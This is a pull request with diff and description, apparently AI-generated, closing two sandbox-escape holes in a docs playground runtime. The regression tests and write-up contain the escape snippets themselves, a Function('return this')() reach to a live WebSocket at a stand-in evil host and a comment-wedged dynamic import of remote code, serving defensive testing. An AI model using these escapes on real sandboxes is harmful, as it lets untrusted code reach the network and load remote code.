### PR TITLE
fix(sandbox): close worker-realm egress escape (Function-constructor) + dynamic-import comment bypass

### DIFF
--- a/docs/sandbox/runtime/browser-runner.test.ts
+++ b/docs/sandbox/runtime/browser-runner.test.ts
@@ -28,6 +28,7 @@ import {
 } from './worker-entry';
 import type { ResultMessage, RunMessage } from './worker-protocol';
 
+import { fileURLToPath } from 'node:url';
 import { Worker as ThreadWorkerImpl } from 'node:worker_threads';
 
 /* -------------------------------------------------------------------------- */
@@ -253,6 +254,119 @@ class ThreadWorker implements WorkerLike {
         void this.w.terminate();
     }
 }
+
+/* -------------------------------------------------------------------------- */
+/*  (A′) Function-constructor egress-escape worker (SEC-01/04/30/34)           */
+/* -------------------------------------------------------------------------- */
+
+/**
+ * A worker-thread body that reproduces the production worker BOOTSTRAP so we can
+ * mechanically prove the `Function('return this')()` sandbox-escape is closed.
+ *
+ * It (1) SEEDS live egress capabilities (`WebSocket`, `XMLHttpRequest`,
+ * `EventSource`, `importScripts`, `navigator.sendBeacon`) onto the thread's REAL
+ * `globalThis` — so before hardening the escape reaches live functions, exactly
+ * as it does in an un-hardened Worker; (2) OPTIONALLY calls the SHIPPED
+ * `hardenWorkerGlobal()` from `harden-worker-global.ts` (the Finding-1 fix),
+ * gated on `msg.harden`; (3) runs the snippet under the SAME allow-listed scope
+ * + AsyncFunction wrapper as worker-entry.ts, where the dangerous globals are
+ * bound `undefined` as PARAMETERS only (the shadowing the escape defeats).
+ *
+ * The snippet reaches the real global via `Function('return this')()` and the
+ * result reports what each capability resolved to. With `harden:true` every one
+ * must be `'undefined'`; with `harden:false` they are live — proving the test
+ * would fail if the bootstrap hardening were absent (the vuln is real, the fix
+ * is what closes it). Runs the thread under tsx (`--import tsx`) so it can import
+ * the real `.ts` hardening module rather than a copy (no logic drift).
+ */
+const ESCAPE_THREAD_BODY = `
+const { parentPort } = require('node:worker_threads');
+const { pathToFileURL } = require('node:url');
+parentPort.on('message', async (msg) => {
+  try {
+    // Seed live egress capabilities on the REAL worker global (an un-hardened
+    // Worker exposes these; a bare Node worker doesn't have them all, so we seed
+    // them to make the "before" state faithful for every capability).
+    const g = Function('return this')();
+    g.WebSocket = function FakeWebSocket(){ this.real = true; };
+    g.XMLHttpRequest = function FakeXHR(){ this.real = true; };
+    g.EventSource = function FakeEventSource(){ this.real = true; };
+    g.importScripts = function importScripts(){ return 'loaded-remote-code'; };
+    g.Worker = function FakeWorker(){ this.real = true; };
+    if (!g.navigator || typeof g.navigator !== 'object') g.navigator = {};
+    try { g.navigator.sendBeacon = function sendBeacon(){ return true; }; } catch {}
+
+    if (msg.harden) {
+      const url = pathToFileURL(msg.hardenModulePath).href;
+      const mod = await import(url);
+      mod.hardenWorkerGlobal();
+    }
+
+    // Production-shaped allow-listed scope: the dangerous names are bound
+    // undefined as PARAMETERS (worker-entry.ts). The escape below bypasses this.
+    const logs = [];
+    const scope = {
+      console: { log: (...a) => logs.push(a), info(){}, warn(){}, error(){}, debug(){} },
+      fetch: async () => ({ status: 200 }),
+      process: { env: {}, platform: 'browser', versions: {} },
+      crypto: { randomUUID: () => 'uuid-0000' },
+      window: undefined, self: undefined, globalThis: undefined, document: undefined,
+      importScripts: undefined, XMLHttpRequest: undefined, WebSocket: undefined,
+      EventSource: undefined, require: undefined,
+    };
+    const names = Object.keys(scope);
+    const values = names.map((n) => scope[n]);
+    const AsyncFunction = Object.getPrototypeOf(async function(){}).constructor;
+    const fn = new AsyncFunction(...names, '"use strict";\\nreturn (async () => {\\n' + msg.js + '\\n})();');
+    const value = await fn(...values);
+    parentPort.postMessage({ type: 'result', logs, notices: [], value: clone(value) });
+  } catch (err) {
+    parentPort.postMessage({ type: 'result', logs: [], notices: [], error: { name: err && err.name || 'Error', message: err && err.message || String(err), stack: err && err.stack } });
+  }
+});
+function clone(v) { try { return JSON.parse(JSON.stringify(v)); } catch { return undefined; } }
+`;
+
+/**
+ * `WorkerLike` over {@link ESCAPE_THREAD_BODY}. `harden` selects whether the
+ * thread calls the shipped `hardenWorkerGlobal()` at bootstrap; `hardenModulePath`
+ * is the absolute path to the real `.ts` module the thread imports under tsx.
+ */
+class EscapeThreadWorker implements WorkerLike {
+    onmessage: ((ev: { data: unknown }) => void) | null = null;
+    onerror: ((err: unknown) => void) | null = null;
+    private readonly w: ThreadWorkerImpl;
+    constructor(
+        private readonly harden: boolean,
+        private readonly hardenModulePath: string,
+    ) {
+        this.w = new ThreadWorkerImpl(ESCAPE_THREAD_BODY, {
+            eval: true,
+            // Run the thread under tsx so `import('<…>.ts')` resolves the real
+            // hardening module (esbuild bundles it in production; tsx compiles it
+            // here) — the test asserts the SHIPPED code, not a re-implementation.
+            execArgv: ['--import', 'tsx'],
+        });
+        this.w.on('message', (data) => this.onmessage?.({ data }));
+        this.w.on('error', (err) => this.onerror?.(err));
+    }
+    postMessage(message: unknown): void {
+        // Fold the harden knob + module path into the run message the body reads.
+        this.w.postMessage({
+            ...(message as object),
+            harden: this.harden,
+            hardenModulePath: this.hardenModulePath,
+        });
+    }
+    terminate(): void {
+        void this.w.terminate();
+    }
+}
+
+/** Absolute path to the shipped hardening module (imported inside the thread). */
+const HARDEN_MODULE_PATH = fileURLToPath(
+    new URL('./harden-worker-global.ts', import.meta.url),
+);
 
 /* -------------------------------------------------------------------------- */
 /*  Tests                                                                      */
@@ -729,6 +843,98 @@ async function runTests(): Promise<void> {
             'SEC-36/37 no globalThis bleed across runs',
             r2.value === 'clean',
             r2.value,
+        );
+    }
+
+    // SEC-01/04/30/34 — Function-constructor egress escape is CLOSED at bootstrap.
+    // A snippet reaches the worker's REAL global via `Function('return this')()`
+    // (bypassing worker-entry's parameter shadowing). After the shipped
+    // `hardenWorkerGlobal()` runs, every real-egress capability it could grab is
+    // inert `undefined`; without it they are live (proven by the control run
+    // below). This is the regression for Finding 1.
+    {
+        // The escape snippet: grab the real global by the Function-constructor
+        // route and report what each dangerous capability resolves to. It also
+        // proves `WebSocket` is not merely shadowed but genuinely unconstructable.
+        const escapeCode = `
+            const g = Function('return this')();
+            let constructed = false;
+            try { new g.WebSocket('wss://evil.example.com'); constructed = true; } catch {}
+            return {
+              ws: typeof g.WebSocket,
+              xhr: typeof g.XMLHttpRequest,
+              es: typeof g.EventSource,
+              imp: typeof g.importScripts,
+              worker: typeof g.Worker,
+              beacon: typeof (g.navigator && g.navigator.sendBeacon),
+              constructedWebSocket: constructed,
+            };`;
+
+        // (i) HARDENED — the production path. Every capability must be gone.
+        const hardenedRunner = makeBrowserWorkerRunner({
+            transpileFn: passthroughTranspile,
+            workerFactory: () =>
+                new EscapeThreadWorker(true, HARDEN_MODULE_PATH),
+            defaultTimeoutMs: 5000,
+        });
+        const hardened = await hardenedRunner.run({ code: escapeCode });
+        const hv = hardened.value as Record<string, unknown> | undefined;
+        assert(
+            'SEC-04 Function-escape run resolved (no error)',
+            hardened.error === undefined && !!hv,
+            hardened.error ?? hardened.value,
+        );
+        assert(
+            "SEC-04 escaped globalThis.WebSocket is 'undefined' after harden",
+            hv?.ws === 'undefined',
+            hv,
+        );
+        assert(
+            "SEC-04 escaped globalThis.XMLHttpRequest is 'undefined' after harden",
+            hv?.xhr === 'undefined',
+            hv,
+        );
+        assert(
+            "SEC-04 escaped globalThis.EventSource is 'undefined' after harden",
+            hv?.es === 'undefined',
+            hv,
+        );
+        assert(
+            "SEC-31 escaped globalThis.importScripts is 'undefined' after harden",
+            hv?.imp === 'undefined',
+            hv,
+        );
+        assert(
+            "SEC-04 escaped globalThis.Worker is 'undefined' after harden",
+            hv?.worker === 'undefined',
+            hv,
+        );
+        assert(
+            "SEC-04 escaped navigator.sendBeacon is 'undefined' after harden",
+            hv?.beacon === 'undefined',
+            hv,
+        );
+        assert(
+            'SEC-04 new (escaped WebSocket) did NOT construct after harden',
+            hv?.constructedWebSocket === false,
+            hv,
+        );
+
+        // (ii) CONTROL — same body WITHOUT the bootstrap harden. This documents
+        // the vuln: the escape DOES reach a live WebSocket. It proves the assertions
+        // above are meaningful (they would fail if hardening were removed).
+        const unhardenedRunner = makeBrowserWorkerRunner({
+            transpileFn: passthroughTranspile,
+            workerFactory: () =>
+                new EscapeThreadWorker(false, HARDEN_MODULE_PATH),
+            defaultTimeoutMs: 5000,
+        });
+        const control = await unhardenedRunner.run({ code: escapeCode });
+        const cv = control.value as Record<string, unknown> | undefined;
+        assert(
+            'SEC-04 CONTROL (no harden): escape reaches a LIVE WebSocket',
+            cv?.ws === 'function' && cv?.constructedWebSocket === true,
+            cv,
         );
     }
 

--- a/docs/sandbox/runtime/harden-worker-global.ts
+++ b/docs/sandbox/runtime/harden-worker-global.ts
@@ -1,0 +1,117 @@
+/**
+ * Worker-realm egress hardening (SEC-01/04/30/34) — run ONCE at worker bootstrap,
+ * before any untrusted snippet executes.
+ *
+ * ─── Why this exists (the Function-constructor escape) ──────────────────────
+ * `worker-entry.ts` binds the dangerous globals (`globalThis`, `window`,
+ * `WebSocket`, `XMLHttpRequest`, `EventSource`, `importScripts`, …) to
+ * `undefined` — but ONLY as AsyncFunction PARAMETERS of the snippet wrapper.
+ * Parameter shadowing is defeated the moment a snippet reaches the real global
+ * by another route. The `Function` constructor is such a route:
+ *
+ *     const g = Function('return this')();   // the worker's REAL globalThis
+ *     new g.WebSocket('wss://evil');         // live socket — egress escape
+ *
+ * We deliberately do NOT delete the `Function` constructor itself (snippets
+ * legitimately define functions, and core/esbuild-bundled deps may build
+ * functions dynamically). Instead we remove the *capabilities* `Function('return
+ * this')()` could reach: every real-egress / remote-code-load API on the worker
+ * global. After this runs, `Function('return this')().WebSocket` (and the rest)
+ * resolve to `undefined`, so the escape reaches nothing.
+ *
+ * The simulator `fetch` shim (`globalThis.fetch = simFetch`, installed by the
+ * worker-main entries) is intentionally PRESERVED — it is the only "network" a
+ * snippet is allowed to see, and it opens no real socket. `fetch` is therefore
+ * NOT in the removal list below; hardening runs before the shim is installed OR
+ * leaves an already-installed shim untouched (it only touches the named egress
+ * capabilities).
+ *
+ * Isolation note: this is defense against the in-realm escape, layered under the
+ * CSP `connect-src 'self'` backstop (SEC-10..13). A worker_threads worker is not
+ * a hard host-isolation boundary (see worker-main.node.ts) — this closes the
+ * ambient-authority egress surface that IS reachable in both tiers.
+ */
+
+/**
+ * The real-egress / remote-code-load capabilities we neutralize on the worker
+ * global. Each is either a live network transport, a way to load & run remote
+ * code, or a way to spawn another (un-hardened) realm. Removing them means the
+ * `Function('return this')()` escape yields inert `undefined`s.
+ *
+ * Exported so the security regression test asserts against the SAME list the
+ * bootstrap enforces (no drift between "what we remove" and "what we test").
+ */
+export const EGRESS_CAPABILITY_NAMES = [
+    // Live network transports / raw-socket egress.
+    'WebSocket',
+    'XMLHttpRequest',
+    'EventSource',
+    'WebTransport',
+    'RTCPeerConnection',
+    // Remote-code load inside the worker realm.
+    'importScripts',
+    // Spawning a fresh (un-hardened) realm that could re-reach these.
+    'Worker',
+    'SharedWorker',
+    'ServiceWorker',
+    'BroadcastChannel',
+] as const;
+
+/** Delete a property if the host allows it; otherwise blank it to `undefined`. */
+function neutralize(obj: Record<string, unknown>, key: string): void {
+    if (!(key in obj)) return;
+    try {
+        // Prefer a real delete so `key in globalThis` also becomes false.
+        delete obj[key];
+    } catch {
+        /* non-configurable — fall through to overwrite */
+    }
+    if (key in obj) {
+        try {
+            // Best-effort inert overwrite for non-configurable slots.
+            Object.defineProperty(obj, key, {
+                value: undefined,
+                configurable: true,
+                writable: true,
+                enumerable: false,
+            });
+        } catch {
+            try {
+                obj[key] = undefined;
+            } catch {
+                /* frozen slot we cannot touch — nothing more we can do here */
+            }
+        }
+    }
+}
+
+/**
+ * Harden the worker's real `globalThis` against the Function-constructor egress
+ * escape. Idempotent and best-effort: a missing capability is skipped, a
+ * non-configurable one is blanked to `undefined`. Call ONCE at bootstrap, before
+ * any snippet runs and (in the browser entry) before or after the sim-`fetch`
+ * shim is installed — it never touches `fetch`.
+ *
+ * @param g The worker global to harden. Defaults to the ambient `globalThis`.
+ */
+export function hardenWorkerGlobal(
+    g: Record<string, unknown> = globalThis as unknown as Record<
+        string,
+        unknown
+    >,
+): void {
+    for (const name of EGRESS_CAPABILITY_NAMES) {
+        neutralize(g, name);
+    }
+
+    // `navigator.sendBeacon` is a real POST egress that ignores CSP `connect-src`
+    // in some engines and survives even when the transports above are gone.
+    // Neutralize the method without clobbering the whole `navigator` (snippets /
+    // core may read benign fields like `navigator.userAgent`).
+    const nav = (g as { navigator?: Record<string, unknown> }).navigator;
+    if (nav && typeof nav === 'object' && 'sendBeacon' in nav) {
+        neutralize(nav, 'sendBeacon');
+    }
+}
+
+export default hardenWorkerGlobal;

--- a/docs/sandbox/runtime/transpile.test.ts
+++ b/docs/sandbox/runtime/transpile.test.ts
@@ -250,6 +250,67 @@ async function runTests(): Promise<void> {
         }
     }
 
+    /* (f) dynamic import() with a WEDGED COMMENT is still rejected -----------
+     * SEC-31/SEC-04 regression. Sucrase preserves comments, so the pre-fix gate
+     * `/(^|[^.\w])import\s*\(/` (whose `\s*` can't match a comment) let
+     * `import/**\/('https://evil/m.js')` slip through to a real module loader.
+     * The comment-neutralizing scan must now catch it. This assertion FAILS on
+     * the pre-fix code (the snippet transpiles to { js }, no error) and PASSES
+     * after. `_transform: id` preserves the comment so the gate sees the escape.
+     */
+    {
+        const id = (s: string): string => s;
+        const wedged = await transpile(`import/**/('https://evil/m.js');`, {
+            _transform: id,
+        });
+        assert(
+            '(f) comment-wedged dynamic import → { error } (not passed through)',
+            'error' in wedged,
+            wedged,
+        );
+        if ('error' in wedged) {
+            assert(
+                "(f) error.phase === 'transpile'",
+                wedged.error.phase === 'transpile',
+                wedged.error,
+            );
+        }
+
+        // Sibling variants an attacker might reach for: a line comment + newline,
+        // and a multi-token gap. Both must reject too.
+        const blockGap = await transpile(
+            `const m = import /* x */ ('https://evil/m.js');`,
+            { _transform: id },
+        );
+        assert(
+            '(f) block-comment gap dynamic import → { error }',
+            'error' in blockGap,
+            blockGap,
+        );
+
+        // A NON-dynamic member access named `import` (e.g. `foo.import(x)`) or a
+        // string that merely CONTAINS "import(" must NOT be falsely rejected —
+        // the neutralizer blanks string bodies and the `[^.\w]` guard skips
+        // member access, so these still transpile to { js }.
+        const memberOk = await transpile(`foo.import('x');`, {
+            _transform: id,
+        });
+        assert(
+            '(f) member `.import(` is NOT rejected',
+            'js' in memberOk,
+            memberOk,
+        );
+        const stringOk = await transpile(
+            `const s = "not an import('x') call";`,
+            { _transform: id },
+        );
+        assert(
+            '(f) `import(` inside a string is NOT rejected',
+            'js' in stringOk,
+            stringOk,
+        );
+    }
+
     /* Summary --------------------------------------------------------------- */
     console.log(`\n${passed} passed, ${failed} failed\n`);
 

--- a/docs/sandbox/runtime/transpile.ts
+++ b/docs/sandbox/runtime/transpile.ts
@@ -243,10 +243,124 @@ async function transpileWithBabel(code: string): Promise<TranspileResult> {
 /** The scope-injected module registry a rebound import calls. */
 const IMPORT_REGISTRY = '__stitchImport';
 
+/**
+ * Return a copy of `src` with comment bodies and string/template-literal contents
+ * replaced by same-length blanks, so a keyword scan (the dynamic-`import()` gate)
+ * sees code structure only — never trivia or literal text.
+ *
+ * A single left-to-right pass tracks whether we are inside a line comment, block
+ * comment, or a `'`/`"`/`` ` `` string, and blanks characters accordingly
+ * (newlines are preserved so line/column stay meaningful). This is a lexical
+ * approximation — deliberately conservative: it does NOT parse template
+ * `${…}` substitutions (their contents are blanked too, which is safe for a
+ * reject-only gate) and does NOT try to distinguish a regex literal from
+ * division. That is acceptable because the ONLY consumer is a coarse "is there a
+ * dynamic `import(` anywhere in real code" check; over-blanking a regex body can
+ * at worst hide an `import(` that lived inside a regex literal, which is not
+ * valid dynamic-import syntax anyway.
+ *
+ * Exported for the transpile smoke test (the comment-bypass regression asserts
+ * the neutralizer collapses `import/**\/(` to a detectable `import(`).
+ */
+export function neutralizeCommentsAndStrings(src: string): string {
+    let out = '';
+    let i = 0;
+    const n = src.length;
+    type Mode = 'code' | 'line' | 'block' | 'squote' | 'dquote' | 'template';
+    let mode: Mode = 'code';
+
+    const blank = (ch: string): string => (ch === '\n' ? '\n' : ' ');
+
+    while (i < n) {
+        const ch = src[i];
+        const next = i + 1 < n ? src[i + 1] : '';
+
+        if (mode === 'code') {
+            if (ch === '/' && next === '/') {
+                mode = 'line';
+                out += '  ';
+                i += 2;
+            } else if (ch === '/' && next === '*') {
+                mode = 'block';
+                out += '  ';
+                i += 2;
+            } else if (ch === "'") {
+                mode = 'squote';
+                out += ' ';
+                i += 1;
+            } else if (ch === '"') {
+                mode = 'dquote';
+                out += ' ';
+                i += 1;
+            } else if (ch === '`') {
+                mode = 'template';
+                out += ' ';
+                i += 1;
+            } else {
+                out += ch;
+                i += 1;
+            }
+            continue;
+        }
+
+        if (mode === 'line') {
+            if (ch === '\n') {
+                mode = 'code';
+                out += '\n';
+            } else {
+                out += ' ';
+            }
+            i += 1;
+            continue;
+        }
+
+        if (mode === 'block') {
+            if (ch === '*' && next === '/') {
+                mode = 'code';
+                out += '  ';
+                i += 2;
+            } else {
+                out += blank(ch);
+                i += 1;
+            }
+            continue;
+        }
+
+        // String / template modes: blank contents, honor `\`-escapes, close on the
+        // matching quote (templates also close on backtick — `${}` is blanked too).
+        const quote = mode === 'squote' ? "'" : mode === 'dquote' ? '"' : '`';
+        if (ch === '\\') {
+            // Blank the backslash and the escaped char (keep newlines).
+            out += ' ';
+            if (next) out += blank(next);
+            i += 2;
+            continue;
+        }
+        if (ch === quote) {
+            mode = 'code';
+            out += ' ';
+            i += 1;
+            continue;
+        }
+        out += blank(ch);
+        i += 1;
+    }
+
+    return out;
+}
+
 function rebindModuleImports(js: string): TranspileResult {
     // (1) Reject dynamic import() before the static rewrite strips `import`
     // keywords. `import(` (not a `.import(` member) is always the dynamic form.
-    if (/(^|[^.\w])import\s*\(/.test(js)) {
+    //
+    // We test a COMMENT- and STRING-NEUTRALIZED copy, not the raw `js`. Sucrase
+    // preserves comments, so a bare post-transpile regex with `\s*` between
+    // `import` and `(` is bypassable by wedging a comment in the gap
+    // (`import/**/('https://evil/m.js')` — SEC-31/SEC-04 escape). Neutralizing
+    // comments (and string/template bodies, so an `import(` inside a literal can't
+    // false-positive) makes the gate robust regardless of intervening trivia.
+    const scannable = neutralizeCommentsAndStrings(js);
+    if (/(^|[^.\w])import\s*\(/.test(scannable)) {
         return {
             error: {
                 name: 'UnsupportedImportError',

--- a/docs/sandbox/runtime/tsconfig.json
+++ b/docs/sandbox/runtime/tsconfig.json
@@ -17,6 +17,7 @@
         "browser-runner.ts",
         "worker-entry.ts",
         "worker-protocol.ts",
+        "harden-worker-global.ts",
         "vendor.d.ts",
         "../component/runner.ts"
     ]

--- a/docs/sandbox/runtime/worker-main.node.ts
+++ b/docs/sandbox/runtime/worker-main.node.ts
@@ -19,6 +19,7 @@
 import { createFetchShim } from '../../../packages/sandbox-sim/src/adapters/node';
 import { allHandlers } from '../../../packages/sandbox-sim/src/handlers';
 import type { SimKnobs } from '../contracts/sim';
+import { hardenWorkerGlobal } from './harden-worker-global';
 import {
     type WorkerEnv,
     type WorkerGlobal,
@@ -33,6 +34,15 @@ import * as zod from 'zod';
 // Baseline knobs for the current run, mutated by `env.applyKnobs`; the shim
 // reads it on every request. URL-explicit knobs still win (see dispatch).
 let currentKnobs: SimKnobs | undefined;
+
+// SEC-01/04/30/34 — harden the worker's REAL global BEFORE any snippet can run.
+// worker_threads gives no host-isolation boundary (see file header): a snippet
+// can reach this global via `Function('return this')()`, bypassing worker-entry's
+// parameter shadowing. Neutralize the real-egress capabilities here so that path
+// finds only inert `undefined`s. Runs before the sim-`fetch` install and never
+// touches `fetch`. (Node has no WebSocket/XHR global by default, but a newer Node
+// or an injected polyfill can add them — this stays correct either way.)
+hardenWorkerGlobal();
 
 // The sandbox-sim dispatch shim — the only `fetch` reachable from a snippet. No
 // real socket is opened; an unknown route returns the sandbox-404 (SEC-01..04).

--- a/docs/sandbox/runtime/worker-main.ts
+++ b/docs/sandbox/runtime/worker-main.ts
@@ -22,6 +22,7 @@
 import { createFetchShim } from '../../../packages/sandbox-sim/src/adapters/browser';
 import { allHandlers } from '../../../packages/sandbox-sim/src/handlers';
 import type { SimKnobs } from '../contracts/sim';
+import { hardenWorkerGlobal } from './harden-worker-global';
 import { browserProcess } from './shims/process';
 import * as stitchBuild from './stitch-browser';
 import { createTraceCollector } from './trace-collector';
@@ -40,6 +41,13 @@ import * as zod from 'zod';
 // `env.applyKnobs` before each run; the shim reads it on every request so a
 // configured knob shapes the whole run. URL-explicit knobs still win (dispatch).
 let currentKnobs: SimKnobs | undefined;
+
+// SEC-01/04/30/34 — harden the worker's REAL global BEFORE any snippet can run,
+// so the `Function('return this')()` escape (which bypasses worker-entry's
+// parameter shadowing) reaches only inert `undefined`s, not a live `WebSocket` /
+// `XMLHttpRequest` / `EventSource` / `importScripts` / `navigator.sendBeacon`.
+// Runs before the sim-`fetch` shim install below and never touches `fetch`.
+hardenWorkerGlobal();
 
 // The sandbox-sim dispatch shim — the only `fetch` reachable in this Worker. No
 // real socket is ever opened; an unknown route returns the sandbox-404 (SEC-01..04).


### PR DESCRIPTION
**security** · review-sweep backfill security finding — **human-merge only, do not auto-merge.**

Two verified sandbox-escape vulnerabilities in the docs playground sandbox runtime (`docs/sandbox/runtime/`), both found by the automated review. Each let untrusted snippet code reach real network egress / remote-code load out of the "no real network, no ambient authority" sandbox. Fixed with minimal changes, each with a failing-before / passing-after regression test. Changes confined to `docs/sandbox`.

## Finding 1 (HIGH, security) — Function-constructor worker-realm egress escape

`worker-entry.ts` binds the dangerous globals (`WebSocket`, `XMLHttpRequest`, `EventSource`, `importScripts`, `globalThis`, `window`, …) to `undefined` **only as AsyncFunction PARAMETERS** of the snippet wrapper. The `Function` constructor is not shadowed, so a snippet reaches the worker's **real** `globalThis` by another route:

```js
const g = Function('return this')();   // the worker's REAL globalThis
new g.WebSocket('wss://evil');         // live socket — real egress
```

There `WebSocket` / `XMLHttpRequest` / `EventSource` / `importScripts` / `navigator.sendBeacon` were still live — violating **SEC-01/04/30/34**.

**Fix:** harden the worker **global** at bootstrap, before any snippet runs. New module `harden-worker-global.ts` deletes (else blanks to `undefined`) the real-egress / remote-code-load capabilities on the worker's real `globalThis`: `WebSocket`, `XMLHttpRequest`, `EventSource`, `WebTransport`, `RTCPeerConnection`, `importScripts`, `Worker`, `SharedWorker`, `ServiceWorker`, `BroadcastChannel`, plus `navigator.sendBeacon` (without clobbering the rest of `navigator`). Wired into **both** worker bootstraps — `worker-main.ts` (browser Web Worker) and `worker-main.node.ts` (server `worker_threads`) — before the sim-`fetch` shim install. The `Function` constructor itself is preserved (snippets legitimately define functions); only the capabilities it could reach are removed. The `globalThis.fetch` sim-shim behavior is untouched.

After the fix, `Function('return this')().WebSocket` (and the rest) resolve to `undefined`, so the escape reaches nothing.

## Finding 2 (MEDIUM, security) — dynamic-import reject regex bypass

`transpile.ts` rejected dynamic import with `/(^|[^.\w])import\s*\(/`, but `\s*` doesn't match a comment, so `import/**/('https://evil/m.js')` (Sucrase preserves comments) slipped through the **SEC-31/SEC-04** control and could load remote code.

**Fix:** don't gate on a fragile raw-text regex. A new `neutralizeCommentsAndStrings` lexer produces a copy of the transpiled JS with comment bodies and string/template-literal contents blanked (newlines preserved), and the existing `import(` check runs against that. Intervening comments can no longer hide the `import(`, and an `import(` inside a string literal can no longer false-positive. This also fixes a **latent false-positive** in the old regex (it wrongly rejected a benign `import(` appearing inside a string).

## Regression tests (both confirmed red → green)

**Finding 2 — `docs/sandbox/runtime/transpile.test.ts`, new block `(f)`:**
- `(f) comment-wedged dynamic import → { error }` — asserts `import/**/('https://evil/m.js')` is rejected.
- `(f) block-comment gap dynamic import → { error }` — `import /* x */ ('…')`.
- `(f) member `.import(` is NOT rejected` / `(f) `import(` inside a string is NOT rejected` — no false positives.
- **Before** (raw-regex gate): the comment variants pass through as `{ js }` → `FAIL` (3 failed). **After**: all pass (26 passed, 0 failed).

**Finding 1 — `docs/sandbox/runtime/browser-runner.test.ts`, new SEC-01/04/30/34 block:**
- Runs the escape snippet in a **real `worker_threads` thread** (under `tsx`, importing the shipped `harden-worker-global.ts`) that seeds live egress capabilities then calls `hardenWorkerGlobal()`, mirroring the production bootstrap.
- Asserts an executed snippet's `Function('return this')().{WebSocket, XMLHttpRequest, EventSource, importScripts, Worker, navigator.sendBeacon}` are all `'undefined'` and `new (escaped WebSocket)` does **not** construct.
- A **CONTROL** run without hardening asserts the escape reaches a **LIVE** `WebSocket` (proves the assertions are load-bearing).
- **Before** (`hardenWorkerGlobal` neutered to a no-op): the 7 hardened assertions `FAIL`, CONTROL passes (42 passed, 7 failed). **After**: all pass (49 passed, 0 failed).

## Verification
- `node docs/sandbox/tests/run-all.mjs` → **11/11 suites passed**.
- Runtime typecheck (`tsc -p docs/sandbox/runtime/tsconfig.json --noEmit`) → clean (added `harden-worker-global.ts` to the include list).
- Browser worker bundle (`build-sandbox-worker.mjs`) and Node MCP worker bundle (`build-sandbox-mcp.mjs`) build with the hardening present.
- Prettier clean on all changed files.

🤖 Generated with [Claude Code](https://claude.com/claude-code)